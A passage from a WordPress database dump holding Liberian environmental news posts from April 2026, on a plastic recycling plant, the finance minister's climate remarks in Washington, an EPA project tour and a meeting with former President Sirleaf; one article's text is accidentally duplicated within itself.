private sector leaders .</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In his remarks, President Boakai reaffirmed his Administration’s commitment to environmental sustainability, job creation, and private sector-led growth, emphasizing that Liberia must move from wastefulness to productivity by turning environmental challenges into economic opportunities. The President highlighted that initiatives such as the Duraplast facility represent practical steps toward achieving national development priorities under the ARREST Agenda, particularly in sanitation, youth empowerment, and industrialization.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5869,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2026/04/CEO-738x1024.jpg\" alt=\"\" class=\"wp-image-5869\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the event, the Executive Director of the Environmental Protection Agency, Dr. Emmanuel K. Urey Yarkpawolo, emphasized that the project directly responds to the triple planetary crisis—climate change, biodiversity loss, and pollution. He noted that plastic pollution remains a major environmental threat in Liberia, contributing to clogged drainage systems, soil degradation, and water contamination.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo stressed that under the leadership of President Boakai, the EPA, in collaboration with city corporations and stakeholders, developed the 2024 National Solid Waste Management Policy, a private sector-driven framework designed to modernize waste management and promote investment in recycling and waste-to-energy solutions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He further highlighted that the Sethi Group of Companies is among the first to operationalize this policy through the establishment of the Duraplast recycling facility, while additional investments are already underway, including a similar plant in Bensonville which is a waste-to-energy initiative by Green Guard Eco Solution.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA and the Monrovia City Corporation, with support from MRV Canada, have also established an organic waste composting facility in Fiamah to convert organic waste into compost for agricultural use.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Duraplast Plastic Recycling Plant is expected to process up to 600 metric tons of plastic waste per month, significantly reducing urban pollution while supporting the circular economy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The facility incorporates a closed-loop water filtration system to prevent chemical runoff into the Mesurado River and surrounding wetlands, as well as high-efficiency thermal systems to minimize air emissions. These measures demonstrate strong alignment with national environmental standards and international best practices.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Beyond its environmental benefits, the project is poised to generate substantial socio-economic impact. It is expected to create over 200 direct jobs and more than 1,000 indirect livelihood opportunities, particularly benefiting youth and women engaged in community-based waste collection enterprises.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The facility will also promote worker safety through strict occupational health and safety protocols, including mandatory use of personal protective equipment and fair labor practices.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In line with the Government’s “Buy Liberia” initiative, the plant will transform plastic waste—such as water sachets, bottles, and containers—into locally manufactured products including pipes, buckets, and chairs, thereby reducing reliance on imports and strengthening domestic industry.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The facility will recycle key plastic types including LDPE, HDPE, PET, and PP, which constitute a significant portion of Liberia’s urban waste stream.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo concluded by commending the Sethi Group of Companies for their investment and leadership, noting that the project represents a turning point in Liberia’s transition from waste management to resource recovery and green industrialization.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This is not just a plant,” he stated. “It is a symbol of a new direction for Liberia—where waste becomes wealth, where policy meets action, and where environmental protection drives economic transformation.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Photos credit: Executive Mansion Liberia</p>\n<!-- /wp:paragraph -->','President Boakai, EPA, and Partners Commission Major Plastic Recycling Plant in Monrovia','','inherit','closed','closed','','5868-revision-v1','','','2026-04-22 17:47:31','2026-04-22 17:47:31','',5868,'https://ekmsliberia.info/?p=5871',0,'revision','',0),(5872,38,'2026-04-17 17:48:03','2026-04-17 17:48:03','<!-- wp:paragraph -->\n<p>Washington, D.C, April 17, 2026 — Liberia’s Minister of Finance and Development Planning, Augustine Kpehe Ngafuan, has outlined the country’s long-term climate vision and development strategy at the World Bank/IMF Spring Meetings, emphasizing both urgent climate vulnerability and ambitious national reform efforts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the 15th Ministerial Meeting of the Coalition of Finance Ministers for Climate Action held on the margins of the annual gathering in Washington, D.C. on Wednesday, April 15, 2026, Minister Ngafuan positioned Liberia as a low-emitting but highly climate-vulnerable nation seeking stronger global partnership and fair financing mechanisms.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He noted that Liberia continues to face serious environmental threats, including rising sea levels, coastal erosion, and shifting rainfall patterns that are already disrupting agriculture, infrastructure, and livelihoods. With nearly 60 percent of the population living along coastal areas, he warned that extreme weather events pose a significant risk to homes, businesses, and national stability.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Despite these challenges, Minister Ngafuan emphasized that Liberia has remained committed to global climate action. He recalled the country’s early support for the Paris Agreement and ongoing efforts to protect and sustainably manage its forest resources, which form part of the Upper Guinean rainforest system, one of the world’s most important carbon sinks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A central highlight of his address was Liberia’s updated Nationally Determined Contributions (NDC 3.0), which sets an ambitious target of a 64 percent reduction in greenhouse gas emissions by 2035 compared to business-as-usual levels, alongside a long-term pathway toward net-zero emissions by 2050.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Minister explained that the revised NDC is not only a climate document but also a national development blueprint. He said, it integrates key sectors such as energy transition, agriculture and food systems, forestry and land use, transport, waste management, and public health resilience.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Our aim is to ensure that climate action drives growth, creates jobs, and reduces poverty,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Minister Ngafuan highlighted ongoing national initiatives, including the expansion of climate-smart agriculture to improve food security, renewable energy investments to reduce dependence on biomass, and coastal protection interventions in vulnerable communities such as West Point and Greenville. These interventions, according to him, combine nature-based solutions with resilient infrastructure designed to safeguard lives and property.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also stressed Liberia’s commitment to inclusive climate governance, noting the increasing involvement of women, youth, and local communities in planning and decision-making processes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, he cautioned that implementation of Liberia’s climate agenda remains heavily dependent on external financing. He disclosed that more than 80 percent of mitigation targets and a significant portion of adaptation efforts rely on international support.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Climate change poses a real macro-fiscal risk to Liberia,” Minister Ngafuan warned, adding that without urgent action, it could slow economic growth, widen inequality, and deepen poverty.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Minister Ngafuan further pointed to structural challenges such as limited fiscal space, weak data systems, and monitoring constraints, which continue to affect implementation capacity. He also acknowledged that economic expansion in sectors such as mining and agriculture presents environmental risks if not managed sustainably.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In his appeal to development partners, the Minister called for predictable, adequate, and accessible climate finance. He emphasized the need for increased adaptation funding, particularly for coastal defense, resilient infrastructure, and climate-smart agriculture.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He further urged stronger international cooperation in supporting forest conservation efforts, describing Liberia’s forests as a “global public good” that requires fair and sustained compensation, including improved access to carbon markets under Article 6 of the Paris framework.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Minister Ngafuan also called for deeper collaboration with multilateral institutions, including the World Bank and the International Monetary Fund, to expand concessional financing, support debt-for-climate solutions, and strengthen early warning systems and institutional capacity.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He urged global partners to support Liberia’s climate journey in a spirit of solidarity and shared responsibility.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Liberia is doing its part. We ask the world to walk this path with us,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>His remarks come as developing nations continue to press for greater equity in global cliMinister Ngafuan Outlines Liberia’s Climate Vision at World Bank/IMF Spring Meetings in Washington DC</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Washington, D.C, April 16, 2026 — Liberia’s Minister of Finance and Development Planning, Augustine Kpehe Ngafuan, has outlined the country’s long-term climate vision and development strategy at the World Bank/IMF Spring Meetings, emphasizing both urgent climate vulnerability and ambitious national reform efforts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the 15th Ministerial Meeting of the Coalition of Finance Ministers for Climate Action held on the margins of the annual gathering in Washington, D.C. Wednesday, April 15, 2026, Minister Ngafuan positioned Liberia as a low-emitting but highly climate-vulnerable nation seeking stronger global partnership and fair financing mechanisms.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He noted that Liberia continues to face serious environmental threats, including rising sea levels, coastal erosion, and shifting rainfall patterns that are already disrupting agriculture, infrastructure, and livelihoods. With nearly 60 percent of the population living along coastal areas, he warned that extreme weather events pose a significant risk to homes, businesses, and national stability.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Despite these challenges, Minister Ngafuan emphasized that Liberia has remained committed to global climate action. He recalled the country’s early support for the Paris Agreement and ongoing efforts to protect and sustainably manage its forest resources, which form part of the Upper Guinean rainforest system, one of the world’s most important carbon sinks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A central highlight of his address was Liberia’s updated Nationally Determined Contributions (NDC 3.0), which sets an ambitious target of a 64 percent reduction in greenhouse gas emissions by 2035 compared to business-as-usual levels, alongside a long-term pathway toward net-zero emissions by 2050.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Minister explained that the revised NDC is not only a climate document but also a national development blueprint. He said, it integrates key sectors such as energy transition, agriculture and food systems, forestry and land use, transport, waste management, and public health resilience.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Our aim is to ensure that climate action drives growth, creates jobs, and reduces poverty,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Minister Ngafuan highlighted ongoing national initiatives, including the expansion of climate-smart agriculture to improve food security, renewable energy investments to reduce dependence on biomass, and coastal protection interventions in vulnerable communities such as West Point and Greenville. These interventions, according to him, combine nature-based solutions with resilient infrastructure designed to safeguard lives and property.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also stressed Liberia’s commitment to inclusive climate governance, noting the increasing involvement of women, youth, and local communities in planning and decision-making processes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, he cautioned that implementation of Liberia’s climate agenda remains heavily dependent on external financing. He disclosed that more than 80 percent of mitigation targets and a significant portion of adaptation efforts rely on international support.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Climate change poses a real macro-fiscal risk to Liberia,” Minister Ngafuan warned, adding that without urgent action, it could slow economic growth, widen inequality, and deepen poverty.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Minister Ngafuan further pointed to structural challenges such as limited fiscal space, weak data systems, and monitoring constraints, which continue to affect implementation capacity. He also acknowledged that economic expansion in sectors such as mining and agriculture presents environmental risks if not managed sustainably.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In his appeal to development partners, the Minister called for predictable, adequate, and accessible climate finance. He emphasized the need for increased adaptation funding, particularly for coastal defense, resilient infrastructure, and climate-smart agriculture.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He further urged stronger international cooperation in supporting forest conservation efforts, describing Liberia’s forests as a “global public good” that requires fair and sustained compensation, including improved access to carbon markets under Article 6 of the Paris framework.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Minister Ngafuan also called for deeper collaboration with multilateral institutions, including the World Bank and the International Monetary Fund, to expand concessional financing, support debt-for-climate solutions, and strengthen early warning systems and institutional capacity.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He urged global partners to support Liberia’s climate journey in a spirit of solidarity and shared responsibility.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Liberia is doing its part. We ask the world to walk this path with us,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>His remarks come as developing nations continue to press for greater equity in global climate financing, particularly for countries facing severe climate risks despite contributing minimally to global emissions.mate financing, particularly for countries facing severe climate risks despite contributing minimally to global emissions.</p>\n<!-- /wp:paragraph -->','Minister Ngafuan Outlines Liberia’s Climate Vision at World Bank/IMF Spring Meetings in Washington DC','','publish','open','open','','minister-ngafuan-outlines-liberias-climate-vision-at-world-bank-imf-spring-meetings-in-washington-dc','','','2026-04-22 17:52:57','2026-04-22 17:52:57','',0,'https://ekmsliberia.info/?p=5872',17,'post','',0),(5873,38,'2026-04-22 17:50:23','2026-04-22 17:50:23','','MFDP','','inherit','open','closed','','mfdp','','','2026-04-22 17:50:23','2026-04-22 17:50:23','',5872,'https://ekmsliberia.info/wp-content/uploads/2026/04/MFDP.jpg',0,'attachment','image/jpeg',0);
INSERT INTO `wp_posts` VALUES (5874,38,'2026-04-22 17:52:54','2026-04-22 17:52:54','<!-- wp:paragraph -->\n<p>Washington, D.C, April 17, 2026 — Liberia’s Minister of Finance and Development Planning, Augustine Kpehe Ngafuan, has outlined the country’s long-term climate vision and development strategy at the World Bank/IMF Spring Meetings, emphasizing both urgent climate vulnerability and ambitious national reform efforts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the 15th Ministerial Meeting of the Coalition of Finance Ministers for Climate Action held on the margins of the annual gathering in Washington, D.C. on Wednesday, April 15, 2026, Minister Ngafuan positioned Liberia as a low-emitting but highly climate-vulnerable nation seeking stronger global partnership and fair financing mechanisms.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He noted that Liberia continues to face serious environmental threats, including rising sea levels, coastal erosion, and shifting rainfall patterns that are already disrupting agriculture, infrastructure, and livelihoods. With nearly 60 percent of the population living along coastal areas, he warned that extreme weather events pose a significant risk to homes, businesses, and national stability.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Despite these challenges, Minister Ngafuan emphasized that Liberia has remained committed to global climate action. He recalled the country’s early support for the Paris Agreement and ongoing efforts to protect and sustainably manage its forest resources, which form part of the Upper Guinean rainforest system, one of the world’s most important carbon sinks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A central highlight of his address was Liberia’s updated Nationally Determined Contributions (NDC 3.0), which sets an ambitious target of a 64 percent reduction in greenhouse gas emissions by 2035 compared to business-as-usual levels, alongside a long-term pathway toward net-zero emissions by 2050.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Minister explained that the revised NDC is not only a climate document but also a national development blueprint. He said, it integrates key sectors such as energy transition, agriculture and food systems, forestry and land use, transport, waste management, and public health resilience.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Our aim is to ensure that climate action drives growth, creates jobs, and reduces poverty,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Minister Ngafuan highlighted ongoing national initiatives, including the expansion of climate-smart agriculture to improve food security, renewable energy investments to reduce dependence on biomass, and coastal protection interventions in vulnerable communities such as West Point and Greenville. These interventions, according to him, combine nature-based solutions with resilient infrastructure designed to safeguard lives and property.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also stressed Liberia’s commitment to inclusive climate governance, noting the increasing involvement of women, youth, and local communities in planning and decision-making processes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, he cautioned that implementation of Liberia’s climate agenda remains heavily dependent on external financing. He disclosed that more than 80 percent of mitigation targets and a significant portion of adaptation efforts rely on international support.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Climate change poses a real macro-fiscal risk to Liberia,” Minister Ngafuan warned, adding that without urgent action, it could slow economic growth, widen inequality, and deepen poverty.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Minister Ngafuan further pointed to structural challenges such as limited fiscal space, weak data systems, and monitoring constraints, which continue to affect implementation capacity. He also acknowledged that economic expansion in sectors such as mining and agriculture presents environmental risks if not managed sustainably.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In his appeal to development partners, the Minister called for predictable, adequate, and accessible climate finance. He emphasized the need for increased adaptation funding, particularly for coastal defense, resilient infrastructure, and climate-smart agriculture.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He further urged stronger international cooperation in supporting forest conservation efforts, describing Liberia’s forests as a “global public good” that requires fair and sustained compensation, including improved access to carbon markets under Article 6 of the Paris framework.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Minister Ngafuan also called for deeper collaboration with multilateral institutions, including the World Bank and the International Monetary Fund, to expand concessional financing, support debt-for-climate solutions, and strengthen early warning systems and institutional capacity.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He urged global partners to support Liberia’s climate journey in a spirit of solidarity and shared responsibility.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Liberia is doing its part. We ask the world to walk this path with us,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>His remarks come as developing nations continue to press for greater equity in global cliMinister Ngafuan Outlines Liberia’s Climate Vision at World Bank/IMF Spring Meetings in Washington DC</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Washington, D.C, April 16, 2026 — Liberia’s Minister of Finance and Development Planning, Augustine Kpehe Ngafuan, has outlined the country’s long-term climate vision and development strategy at the World Bank/IMF Spring Meetings, emphasizing both urgent climate vulnerability and ambitious national reform efforts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the 15th Ministerial Meeting of the Coalition of Finance Ministers for Climate Action held on the margins of the annual gathering in Washington, D.C. Wednesday, April 15, 2026, Minister Ngafuan positioned Liberia as a low-emitting but highly climate-vulnerable nation seeking stronger global partnership and fair financing mechanisms.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He noted that Liberia continues to face serious environmental threats, including rising sea levels, coastal erosion, and shifting rainfall patterns that are already disrupting agriculture, infrastructure, and livelihoods. With nearly 60 percent of the population living along coastal areas, he warned that extreme weather events pose a significant risk to homes, businesses, and national stability.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Despite these challenges, Minister Ngafuan emphasized that Liberia has remained committed to global climate action. He recalled the country’s early support for the Paris Agreement and ongoing efforts to protect and sustainably manage its forest resources, which form part of the Upper Guinean rainforest system, one of the world’s most important carbon sinks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A central highlight of his address was Liberia’s updated Nationally Determined Contributions (NDC 3.0), which sets an ambitious target of a 64 percent reduction in greenhouse gas emissions by 2035 compared to business-as-usual levels, alongside a long-term pathway toward net-zero emissions by 2050.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Minister explained that the revised NDC is not only a climate document but also a national development blueprint. He said, it integrates key sectors such as energy transition, agriculture and food systems, forestry and land use, transport, waste management, and public health resilience.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Our aim is to ensure that climate action drives growth, creates jobs, and reduces poverty,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Minister Ngafuan highlighted ongoing national initiatives, including the expansion of climate-smart agriculture to improve food security, renewable energy investments to reduce dependence on biomass, and coastal protection interventions in vulnerable communities such as West Point and Greenville. These interventions, according to him, combine nature-based solutions with resilient infrastructure designed to safeguard lives and property.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also stressed Liberia’s commitment to inclusive climate governance, noting the increasing involvement of women, youth, and local communities in planning and decision-making processes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, he cautioned that implementation of Liberia’s climate agenda remains heavily dependent on external financing. He disclosed that more than 80 percent of mitigation targets and a significant portion of adaptation efforts rely on international support.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Climate change poses a real macro-fiscal risk to Liberia,” Minister Ngafuan warned, adding that without urgent action, it could slow economic growth, widen inequality, and deepen poverty.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Minister Ngafuan further pointed to structural challenges such as limited fiscal space, weak data systems, and monitoring constraints, which continue to affect implementation capacity. He also acknowledged that economic expansion in sectors such as mining and agriculture presents environmental risks if not managed sustainably.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In his appeal to development partners, the Minister called for predictable, adequate, and accessible climate finance. He emphasized the need for increased adaptation funding, particularly for coastal defense, resilient infrastructure, and climate-smart agriculture.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He further urged stronger international cooperation in supporting forest conservation efforts, describing Liberia’s forests as a “global public good” that requires fair and sustained compensation, including improved access to carbon markets under Article 6 of the Paris framework.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Minister Ngafuan also called for deeper collaboration with multilateral institutions, including the World Bank and the International Monetary Fund, to expand concessional financing, support debt-for-climate solutions, and strengthen early warning systems and institutional capacity.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He urged global partners to support Liberia’s climate journey in a spirit of solidarity and shared responsibility.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Liberia is doing its part. We ask the world to walk this path with us,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>His remarks come as developing nations continue to press for greater equity in global climate financing, particularly for countries facing severe climate risks despite contributing minimally to global emissions.mate financing, particularly for countries facing severe climate risks despite contributing minimally to global emissions.</p>\n<!-- /wp:paragraph -->','Minister Ngafuan Outlines Liberia’s Climate Vision at World Bank/IMF Spring Meetings in Washington DC','','inherit','closed','closed','','5872-revision-v1','','','2026-04-22 17:52:54','2026-04-22 17:52:54','',5872,'https://ekmsliberia.info/?p=5874',0,'revision','',0),(5875,38,'2026-04-17 17:53:32','2026-04-17 17:53:32','<!-- wp:paragraph -->\n<p>Monrovia, April 17, 2026_The Executive Director of the Environmental Protection Agency (EPA) of Liberia, Dr. Emmanuel Urey Yarkpawolo, on today, Friday, April 17, 2026, paid a strategic visit to the Ministry of Agriculture to assess a facility designated to host the implementation team of a major climate resilience initiative.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The visit forms part of ongoing preparatory efforts for the rollout of the Strengthening Agricultural Resilience through Transformational Livelihood Adaptation (SARTLA) Project, an ambitious $10 million program aimed at strengthening Liberia’s agricultural sector against the impacts of climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the tour, Dr. Yarkpawolo and his team were taken through the facility that will serve as the operational hub for the SARTLA Project team.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The assessment focused on ensuring the space is adequately equipped to support coordination, research, and field implementation activities under the project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The SARTLA Project, which will run from 2026 to 2030, is being implemented by the EPA in partnership with the United Nations Development Programme (UNDP), with funding from the Global Environment Facility (GEF).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The initiative seeks to enhance the resilience of vulnerable farming communities by promoting climate-smart agricultural practices and improving livelihoods.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The project is expected to support farmers across Liberia by introducing innovative adaptation strategies, strengthening local capacities, and improving access to sustainable agricultural technologies.</p>\n<!-- /wp:paragraph -->','EPA Executive Director Tours Agriculture Ministry Facility for $10M Climate Resilience Project','','publish','open','open','','epa-executive-director-tours-agriculture-ministry-facility-for-10m-climate-resilience-project','','','2026-04-22 17:56:37','2026-04-22 17:56:37','',0,'https://ekmsliberia.info/?p=5875',16,'post','',0),(5876,38,'2026-04-22 17:55:47','2026-04-22 17:55:47','','STARR-2','','inherit','open','closed','','starr-2','','','2026-04-22 17:55:47','2026-04-22 17:55:47','',5875,'https://ekmsliberia.info/wp-content/uploads/2026/04/STARR-2.jpg',0,'attachment','image/jpeg',0),(5877,38,'2026-04-22 17:56:35','2026-04-22 17:56:35','<!-- wp:paragraph -->\n<p>Monrovia, April 17, 2026_The Executive Director of the Environmental Protection Agency (EPA) of Liberia, Dr. Emmanuel Urey Yarkpawolo, on today, Friday, April 17, 2026, paid a strategic visit to the Ministry of Agriculture to assess a facility designated to host the implementation team of a major climate resilience initiative.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The visit forms part of ongoing preparatory efforts for the rollout of the Strengthening Agricultural Resilience through Transformational Livelihood Adaptation (SARTLA) Project, an ambitious $10 million program aimed at strengthening Liberia’s agricultural sector against the impacts of climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the tour, Dr. Yarkpawolo and his team were taken through the facility that will serve as the operational hub for the SARTLA Project team.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The assessment focused on ensuring the space is adequately equipped to support coordination, research, and field implementation activities under the project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The SARTLA Project, which will run from 2026 to 2030, is being implemented by the EPA in partnership with the United Nations Development Programme (UNDP), with funding from the Global Environment Facility (GEF).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The initiative seeks to enhance the resilience of vulnerable farming communities by promoting climate-smart agricultural practices and improving livelihoods.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The project is expected to support farmers across Liberia by introducing innovative adaptation strategies, strengthening local capacities, and improving access to sustainable agricultural technologies.</p>\n<!-- /wp:paragraph -->','EPA Executive Director Tours Agriculture Ministry Facility for $10M Climate Resilience Project','','inherit','closed','closed','','5875-revision-v1','','','2026-04-22 17:56:35','2026-04-22 17:56:35','',5875,'https://ekmsliberia.info/?p=5877',0,'revision','',0),(5878,38,'2026-04-17 17:57:06','2026-04-17 17:57:06','<!-- wp:paragraph -->\n<p>Monrovia, April 17, 2026 – The Environmental Protection Agency (EPA) and the United Nations Development Programme (UNDP) have held a strategic engagement with former Liberian President Ellen Johnson Sirleaf as part of ongoing consultations with national stakeholders on climate resilience and coastal protection efforts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The interaction which took place in Monrovia Thursday, forms part of broader institutional engagements around Liberia’s climate agenda, focused on the increasing impact of coastal erosion in vulnerable communities across Monrovia and other coastal areas. Participants shared perspectives on strengthening adaptation measures and scaling up practical interventions to safeguard communities and infrastructure.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>EPA Executive Director, Dr. Emmanuel King Urey Yarkpawolo, and UNDP Country Representative, Aleiou M. Dia, emphasized the importance of inclusive dialogue and multi-stakeholder collaboration in advancing national climate priorities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Discussions also highlighted opportunities to mobilize climate financing, including the potential development of a coastal defense and livelihood support concept for submission to the Fund for Loss and Damage. The initiative is expected to integrate both engineered and nature-based solutions while supporting livelihoods in at-risk communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The engagement further explored collaboration between UNDP and the Ellen Johnson Sirleaf Presidential Center for Women and Development, particularly in the areas of capacity building and women’s leadership in climate resilience.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5879,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2026/04/Dr-859x1024.jpg\" alt=\"\" class=\"wp-image-5879\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>As part of ongoing knowledge-sharing efforts, Dr. Yarkpawolo presented key national policy documents, including the Natural Capital Atlas of Liberia and the Local County Action Plans, reflecting Liberia’s commitment to data-driven and locally grounded climate action.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also in attendance were Ellen Pratt, Executive Director of the Sirleaf Presidential Center, Salimatu Gilyeneh of UNDP, and other stakeholders.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The engagement underscores the role of broad-based partnerships in supporting Liberia’s climate resilience and sustainable development agenda</p>\n<!-- /wp:paragraph -->','EPA, UNDP, Former President Sirleaf Engage on Climate Resilience and Coastal Protection','','publish','open','open','','epa-undp-former-president-sirleaf-engage-on-climate-resilience-and-coastal-protection','','','2026-04-23 14:17:39','2026-04-23 14:17:39','',0,'https://ekmsliberia.info/?p=5878',15,'post','',0),(5879,38,'2026-04-23 13:35:02','2026-04-23 